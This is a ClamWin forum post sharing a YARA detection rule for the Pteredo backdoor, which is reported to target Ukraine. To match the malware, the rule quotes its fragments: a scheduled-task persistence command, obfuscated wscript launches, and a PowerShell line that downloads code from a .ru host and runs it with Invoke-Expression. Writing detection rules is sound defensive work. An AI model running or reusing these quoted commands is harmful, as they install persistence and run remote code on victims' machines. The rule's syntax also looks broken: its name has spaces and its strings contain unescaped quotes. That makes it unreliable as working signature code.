 | Yara Signature For New Pteredo Malware Targeting Ukraine |  |
GuitarBob
Joined: 09 Jul 2006 |
Posts: 9 |
Location: USA |
|
 |
Posted: Wed Apr 20, 2022 6:12 pm |
|
 |
 |
 |
 |
Below is a Yara signature for a new Russian backdoor targeting Ukraine computers. I didn't get any scan errors, so it should work. Copy the file to a new Notepad file from the word rule to the ending } and save it as a file named Pteredo.yar in the ClamWin database folder. Save it in All Files format and make sure there is nothing in the name except Pteredo.yar only. After you save it, scan a file with ClamWin to make sure it works. If there is a problem, please accept my apologies, and delete the file from the ClamWin database folder.
Unlike the usual mdb or hdb hash signatures, Yara sigs should keep for a long time, so keep it around--it may come in handy if you take your laptop to Ukraine.
Regards,
rule indications of Russian Pteredo malware targeting Ukraine
{
strings:
$a = "createObject("Shell.Application").ShellExecute "SCHTASKS", "/CREATE /sc minute /mo 10 /tn " + """UDPSync"" /tr ""wscript.exe """ + hailJPT + """" & " jewels //b joking //e VBScript joyful "" /F ", "" , "" , 0"
$b = ""wscript "[USERNAME]\lubszfpsqcrblebyb.tbi" //e:VBScript /w /ylq /ib /bxk //b /pgs""
$c = ""wscript "[USERNAME]\lubszfpsqcrblebyb.tbi" //e:VBScript /w /ylq /ib /bxk //b /pgs""
$d = "cvjABuNZjtPirKYVchnpGVop = "$tmp = $(New-Object net.webclient).DownloadString('https://'+ [System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+'.corolain.ru') +'/get.php'); Invoke-Expression $tmp""
$e = "wscript "[USERPROFILE]\atwuzxsjiobk.ql" //e:VBScript /tfj /vy /g /cjr /rxia //b /pyvc"
condition:
any of them
}
|
|
 |
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by
phpBB © phpBB Group
Design by
phpBBStyles.com |
Styles Database.
Content © ClamWin Free Antivirus GNU GPL Free Software Open Source Virus Scanner. Free Windows Antivirus. Stay Virus Free with Free Software.